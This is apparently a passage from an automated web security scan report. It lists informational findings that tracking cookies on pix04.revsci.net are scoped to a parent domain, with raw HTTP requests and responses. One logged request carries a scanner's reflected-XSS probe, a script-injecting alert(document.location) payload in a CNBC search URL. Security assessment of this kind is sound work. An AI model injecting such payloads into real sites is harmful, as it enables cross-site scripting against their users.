Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxCrpZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5XrH+SP65Ffqe16M3wgUTl9ZjjhbqaES50QAhloD6YIMfvrDyarDh6IoZrtSvTCk8LjesfMWQVRxwab1CLpZaOWmsitT5Y0P/+hoNIUEKljBrDPYeWXhjriypfjxvHkFnxuX4VXsMcQ5xnwEUjm/Rc6qb1FabBxQ8EKzz8vsWQ/OqU23h7yjaEmxKbmSdyhWthxJadkgcdRrRFzpo1Nh+z72spGNLXT62mRuq7ef0ICZMxwshGjff2njGHZyx8cEyzVGx1jDZ62LHzyj9MlKLcxpnDR+oIHbH2WGOkU80W7iI0DrptPJGzVJ25jpy6l0cKZYLjs9AdoIbkOrEn0EkoMpx8cssfJYS+UFSE6Y7m2Ml9BwY1PdwJgSNEMnePEIHIjPWxteWc6m1JncZkK9nDuxHWxj8jyy+9ctaeTrNTs6R1adeibPCMw44vZHXVcVYQb7YaQRisRwvMh8XsfKx1ikdZeRFvAR3zI8OXajA4pswprmztVXPxEd12QFkcsVBHMa+9Bm2US3w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:37:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/715243108.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_it_I="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3Jk6SbsCfx2sIAzWnsKdaJpq/vgMjZwfx7CNcghgKg0iYFhqkmSSdtbgu/Eq4vgS+6T3DVyadgixjRF5rVBTuI+/RhFvE2hMxqEFJukk28qnTPe1ZW1sh8tlYqMs7ZaLKSaWXOOG2XJGaGhxb25yxG18f1d6kOqX0KkmzPq+ESBQLjw3PZEh0zR4jKIIurU+S6mKpbUtCgJflh0uh/KLEr0Zzn9XR1K7XrTICbc6Q8TuLz3y3BZS6ug1o7g3Xy/T9DtM2qmOFMN+YhDn5aIAL+Wg8Zp2rSKaCYECJHvLc26F2gDFs/vIP+LpkOizAdb7zfOOafTm9cFXciZzQi54/7lZU4QM0W8RtdfdFFZy6fTxfxoo5eN416HqPeYbLf0iVDInnSggM8md3lIuFgsWK8ALKlDXazM4yyp2bHRZHR7BUhrjHd5BfDum1No/fbaEQlYxanPnmT5KY7wyUrwrsQZbslTdDiRHSR9F5I/W+839Dpgrb8nIQ53KU+Ng3qHJ473eYokcGbedh0XAeIn9NHDUIEfTtXBebbQxhEogm3b82hQjRugWan+2vYfItTiWqm2M/0nchlUL1K1Fn9aF7sXo7CPLy+6K8x6VN++lmEYw7v0PsE6aqhbkqGjf5Ykbhh2Opo4k/ybPhwc0L7tIwzrJ3kntUiIUj6cywBvOxK7y3GEKazAoe9/+8rKgJkak3rUxjmU2VHRh2HEmgULv44ezxycttRIaho+IVjIO9X79y6OiW/yqMupzKrBgs2JgfbRdglt0NCXqSKVE72PQXcXYhFOmAgY7X3euCp4mGzLJEbUtpgJ1T/O2MQNA9wUg/P/aJhM/HUwp2SMC3fsJui3LgLW9U3mQ/tuxr1848ce1eyzlRJFAMrWH864jQN+b7jrpbdVHco2AjMi+YUiDfe7Jmgt9WblTrHJsOJTX38qN2PTaxwMje4YFU9H5mgCMpyXjpsTCwDSqjN308k9TXT6LwjU4HdBNzN1Ompb7x5juiM7sXMDnKI/xzYDyygqBZXAEclBicEotUtHOrmC3cMTUZYGZzoLg9oIzlnae3N2YuT8KxbW/qNR5AQE3ke9by55+Va3iwQFNZqWBFTweqJEZmfs+gwx7DXJS1qPVpWawIeVB5zFi7p3qKnhiarRTyBJRCHO6i3nWS4nRae1EyreustY64IlmwTG0S1bQvbWFqONMEjRGz4Paq/Y3p6Z0a7Rcc2BtoTeuQT7bLml1byvyEDhfMAQKkhXGwRxg98JxcMDceUvdKF9ilVoZML1oXg9chhxYCJ4IrIypvebqd5r8QuXBw=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd1yGE6g8BwU8BLTkNk43VN7eq0QNSW3IUkioEsHIutVu1CLfKMnApLMfGK0rX2Y4suERz3AzYxm0B46Xf51wRLqXjsjHtiMYCuk8/Ai0Md6jGPTKhBYdQMtcWmZ9mmoM3pUBMNLMvCKFJz+fyoe95N9cDHHyciFups/NYIhgCIzxhfdpujXJD7jp+g2EzGPG++Fn0WbbGjOha2iYDawnvmekncJzWncmw49BryuYGiev5Vm1P3OWZbhYA42bE5AudfiMPXOGaGko9RunC/sgnulIKvCnA8pu65st5BrwyC9/9NBSf85RMsvT4IbxQ2ok0fplAi/9GmZyk1pvvB2muooyyNzUx2Be1eokgwS11WAFXUxZOKaM4n1GP4x/2tN9hRDVs3rZT4HcErVpaoHTFXdnNlTfI03lmtVIhceY2l0b17ce5sP98EG1uTGdHLYpdZdIbP59Fnt1KuHmz7Z80JCzRE9hJAyLfUiRH6eEiv8xB/AT+u9ividjAcx7tiQR9JMdUe2NLnrKR5qIkEE/WP6HYU+bOa6PzpSNqFFNUKKW2dqDEVMZinKhzdVIEZ5n81mrKFskOY7o/c3TqxLlSRLQNIx/sl69XQoSJuWmc5bzANgZHrJ0YTEdcopTaz7jFN0wIZHzJiMekt7NnOgsgC7g21KeZWQqYpWcMf7B1MHi203mm+OjogUYbrLYRNvOS2dnZsXENPgBQ4/CjphGzacW8mGb57HXKInWZGIAhUPKN+0BQHzjCECuPs/+eC7wI/VWqyNsbbk+EQ5TOX9cHP1dxBJQ54QPhPF4Ap6HTenlvjge7upqBAAXBQK8H1p3Z7cJDHRop+iIRpKaRshvN/HixA7M6TkZCMUYSqrsfblj2g+LwbSRohAPlVkOE89tREvaNPKijTwZjwTa6a9ykVaD1MDLLGgvxgYUWLZJiEiFwd+WPs2EstzUkgUPV3loc5LtfRfmV55RnJPcVlQ50PQGrR8tYnMaCVTsghXyudZu/+mhWFnjP31Fo4aPw2+R/Y4vFE+8Cbkip4uWG8qw3ZH1QiYllfK2IhPX0sg4UgeCB2usVICpN1xJws9XAPOs3k5eXQLcTUsksigUlUhyfpcR8wQXSbnmqAjbetg4vcSx2mux4x9oEzdUsxO+cNwmolgN13z4rfpIQxrKCq3MsV/wq2FBewuALM527Ob9GDEEg5Dq7OswyPbOTgG58UDtNpkDA+xX3yhs9kemF8rWsyD/ZVql+Bs1GgN72NbQIdvmUaeBiIvoVciEvorPA0q3PV58iVSdywdf8mXFXL9rtny1654Zfoen40JSP1PV8Dn2Xapq1//nDAlTbxsxJ535LeKAxAA0/4QNbMTX+k95VCGmn6JqxMivQZYJ2dEEBs5jv09xGclp2YPhMZkt+z2JjjmOzn/vGZUShY2eaai3OK/+D0Jsc9fR0xfsnqrsUBhMeLdWwWLTdookcDuj9hwPq0aNf2AQM/aWHk/NA17N+3obiED4+QsiBhZRqYjqjqLzHVNGJG8uLNjvR4iekCDQAqenfaZB0wC372TwnI+RS32sms74NwPqFuyLJTWNfchShfrwbJQ7DO0HplRcfZnu9mFuUZ5IlYFJI9RIha+KkNKk4Fd2TQD82t9Xe7XqkFrUWTXiU8RWVLVab7qUYWckhI8LEoqh5dxwWpaAXqd/tXuthBPw0k/4OlqVmtpAnb4kktw8xvo+bEAH2jH5c+QxhqO8ylhNTwDSzHmjFH9UN"; rsi_segs_1000000=pUPF40OheXIQT7uItGF29/yo/tk8g7ZPQm8locHc+gQ4O3XY0n+Y1R9p5LQR/PIErcX9nuNJfDGwMRbCd/RW03SbWpGBTaXuSjFGtboVpXIEPSzFR/qEKuucJ/QVQu6tvFVgkyggeJQwdEme0illSJAxJ52iYVOSAP8RQUf3CVUVWq3P5Ju5c1oEGEh79dQwYfzAVKcG+AW0UhUxCW6Jwnfvzng/YwFJ03qPfozHCvj3ZXGEZ8U8qi/40G4P1jRR/sxK2Sawi7ltritrF3HM187dUdZ7ZBFGUzM4bs8JeyY6/iWgzAzuCCE2r0860uMYnX2pQv5Vx18gJruX/zGxWhXguFqIdC7CXm4XUQl+UCwnI0akM4CHGY687RH1crG1dgmMICvMsU9Gc6ktlOi+5d5YisMnFkigtQN54QgtBWR6/Qzj9qfl9OQLneY/hUNZ+E5cWhK0FlAu5vZRZ6yJkGrInjKw27be7pzTcpH13I1Juf7RrEthnMIwi11mG1YqPgMLEI9jzG5hrmcjKy3x5EwUNgB8fJ2eEyP4ar825ZS+nxRoYcCxWUcJ76Tu2H7JZLGQ7Na226h4tZRpkbqhw6TK7BxNiwZPMAWEwHf586NJW0SqcAjbAqJ5kUv02qYny+xGf6G6uQnj5KkqBvGC7P2mI7a/47o=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxCrpZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5XrH+SP65Ffqe16M3wgUTl9ZjjhbqaES50QAhloD6YIMfvrDyarDh6IoZrtSvTCk8LjesfMWQVRxwab1CLpZaOWmsitT5Y0P/+hoNIUEKljBrDPYeWXhjriypfjxvHkFnxuX4VXsMcQ5xnwEUjm/Rc6qb1FabBxQ8EKzz8vsWQ/OqU23h7yjaEmxKbmSdyhWthxJadkgcdRrRFzpo1Nh+z72spGNLXT62mRuq7ef0ICZMxwshGjff2njGHZyx8cEyzVGx1jDZ62LHzyj9MlKLcxpnDR+oIHbH2WGOkU80W7iI0DrptPJGzVJ25jpy6l0cKZYLjs9AdoIbkOrEn0EkoMpx8cssfJYS+UFSE6Y7m2Ml9BwY1PdwJgSNEMnePEIHIjPWxteWc6m1JncZkK9nDuxHWxj8jyy+9ctaeTrNTs6R1adeibPCMw44vZHXVcVYQb7YaQRisRwvMh8XsfKx1ikdZeRFvAR3zI8OXajA4pswprmztVXPxEd12QFkcsVBHMa+9Bm2US3w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:37:46 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:37:45 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.183. http://pix04.revsci.net/I10985/b3/0/3/1008211/719321222.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/719321222.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNJ0mFqAIQl6mdYdLQRDvQYIIfkSSOTViaZYlpwhEt6/78z0FbFgF267p/sMT/w0fqNmBL15gMQkV6teZFGMKJ0J/jnIhKaoSScicbImwMNzXmtCG7Gcvwy2l/XGe0r1BCBugCYTv6xau5qK8DrEB/pspFxMdNmeRi8E02GPKdEu6/rDLGppJHaCCytRrreBC5YV7+xd5+TyoznWmW+DMcIkB+TsGA2HdGtXu4ad1zXIEZD2/w/dFsb+y7xZOz46+WpTV9f7WHLXQU2+0qz+yrm/0ipbWyXB8ug6hzummJ6g==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:13:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/719321222.js?D=DM_LOC%3Dhttp%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss3a34b%25253C%252Fscript%25253E%25253Cscript%25253Ealert(document.location)%25253C%252Fscript%25253E7c5fa54ba36cca68%2526categories%253Dexclude%2526searchboxinput%253Dxss%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; NETSEGS_K05540=d303c7ec11fd6a67&K05540&0&4e0bd851&0&&4de5e0dc&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; NETSEGS_F10933=d303c7ec11fd6a67&F10933&0&4e0bdb5a&0&&4de5f240&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rtc_oeWp=MLsvr9EvsT9n5xAcp61USLbh0Yvf9FBmafEhRPlfI5p+mTDWyPYYOo1ec4SdcT/xZD9oHkFrXiYO5u8ddTWrZA0alBeqme/BMnwWP7fBagJ7LAm9GzihniUHpxRSDbtE/y4Dn6r3O6v/mriQ+Obigzb9LmofjydaggTJhz5gnR8EipwELzPSikU870mspBI3+IEgddJ7G/b+/Mx2T+SF9oSWifT9ptBAt/fQNWI3RCPJdkNUsfQve23xV4XhnXe3e6I/WJUEg1+hF9UZbVMmpJmffW1c12Jo61EcVbf50khu/tDmsD+sRQJqKmNqrLB5rmQIs2u5wqoWMox7JNV8IT2g/I16SmUiMg==; udm_0=MLv/NFMJbipn3o+84l+pDdRQVORBRjEuxSmA7s15kGewdElyr/35ImZg3+kFSJQVGkEWEwhdDnZzfDE6nSd1WztndEk/TwQn+ElrbgPpaPVMhZJlMmEkZU3OG00DTAr++/uWE4rp2Bz/1qUbY70aWYu++sQb9OX1abiU4oQkLV4H77ItbNdqWKyiv1A8SA9uSE7PG4wtc/1q2/5TPeGjjUmL0/v13AfQZPr53LBa06DP3vHUUf+c25mah1jOCt8jEH8T5BaxT1MomGdaDj8W0lJLTjAuU2hy15xSbvJiIeti42X7wNiGKg8c/veiuJjF8l7fCxXgcWmuB4y10I6gqgTzFfVRH9YrSJ3mTPhD1PlYZHsDlPhnBi1hgjej8SrR8Gx3i5a8Xrx5UG7bJumwEumGEYAcpusZpAz2e0xc8HebR6OeEkl2NnWAtqx/mAoEB5KXjihUGmEieQVOXw/1vjZsRk5N2oTPCRnCU9mgz75l6wg4N0xq1Ckejpv0lrLuJ0G8Ty5FILpGrYZkjQ0sFoSYzAV6b6IP2LIkJg8GLdya33UjBNj2UM47laItOeyfnLFLYPD5ZE8iC2C+PzKYIJoUT/bbQ1EDpLVNGD0kf19m9PEYEYyYAGrhFUgIoJHsWAFTFHsrgS/o5WETeomssMnH7H907/ddBBaFCsbNZB6yM4D9wZlT0nFQtjQoM13oGZZeLfEXtJY1iN4AxS4Elwb+Iu9QG0dXcFClGkxG+ZJx+rL4y7yRYRXwu1CDn5PVWVpMOC6r022PGSVXCV3ywro5LijFJUuMKe5TkGnopnvTeD1IQ/DDZThrO1gWsna5GBCXyQ4VTsBB40bT/xAXTWgIvizuY5iCGk00A5DacVr8ObaWui72gIE9/jGHygBv8AIUTos37C79clCQ8DNqj/xKt5Z+5VpVC6XTXS/SMTxa/E1dOiY/sFRwW6J36hfqAgg/Lxjd17qGOgA/SFIQ2qjEYikSSDnmvztI69i5pCZqVdJ1dwniH4P0B6M+CxS9uR1YG4BTNCQbCyZZs5SVn/xOTs58rWz5tJE9gOypHiqqpdsZ0n4u/YE+ohXaN+rqev74JokV+JyfBKHZaXlJZxBZRwOvm5QZxfvBjGysFjjPeK6j3yzM6bc+sVeYbSLRq7Gl/9pktpi+M4glq0tmh1fBNE4egIw/CMyYJWbBo9yGOzWxT/MkAMK2UV1hMzG3DaM6jVKiLpU2IEiwvZORhpG11TCatIMNsbZI0MhOMzYZFw==; rsi_segs_1000000=pUPNJ0mFqAIQl6mdYdLQRDvQ4IEfkaQ6w9OEg38IvPFn7xHE6oV5zuN5XuH4lMsqIqHM/odPhtKoJLHJfDoxyDYbtzjNjeUEPIaSkCQLIuOBNjzlq4l30K2MqI9hQsgtNgP1X3nUkzesMu4izcwIZuPvtcs8cP7WNWTuDEi5LH2Gdq4lQiyeVzaJD6+gg4SHNGmBvh80fYEwZ8aoIw8tmOAF5yIz4n7/VPtn7X3qRHOZkUGqIk2NMc02SO7xBG0qumGacLFN3aEpTQ9EHuM52mdaEN50ro4Vy6zxcCmEPZ+Ih28=; rsiPus_dtTq="MLtHpFEtcD5rIJHwatoH3e1ONq1pb86XnR2fg9ybFEZq8gTDZYQY6HRwT+1kiSaiaeZp4snAftaXDCltLCfFwOF9fi9E8AyUtqDAHZhyD5YTPoZn4ocuRWuyLaPZCLI2rrFzIkZqypiUEK5Fk4/zLBRUcseHLRZiZUCEHPN3xy096AqbPW1SGtB70NxJYIOTWn2CjrlB4B8gMpSthDhn8yHCe9Dab2kdDh4z6EIn60vqeZ5pA4OYfsAIvFClPlfyaHpO7G0Jn4V/hDIdtHSAe0EiwcwMKYfFQG2V1BQr5v+b+2UsjSJvDByqf5WQTPJlbf0dA1RZ8ZRyuNy8m2TZIVmW3Yvcguxd9PIQUeVNyi6yg34KPDl8900wujbwYJPpAN+wS5uhZAK++uMZXALwshUUyMxw77kMwMDpGqlwyxYvr+/32yx1328ilFNL"; 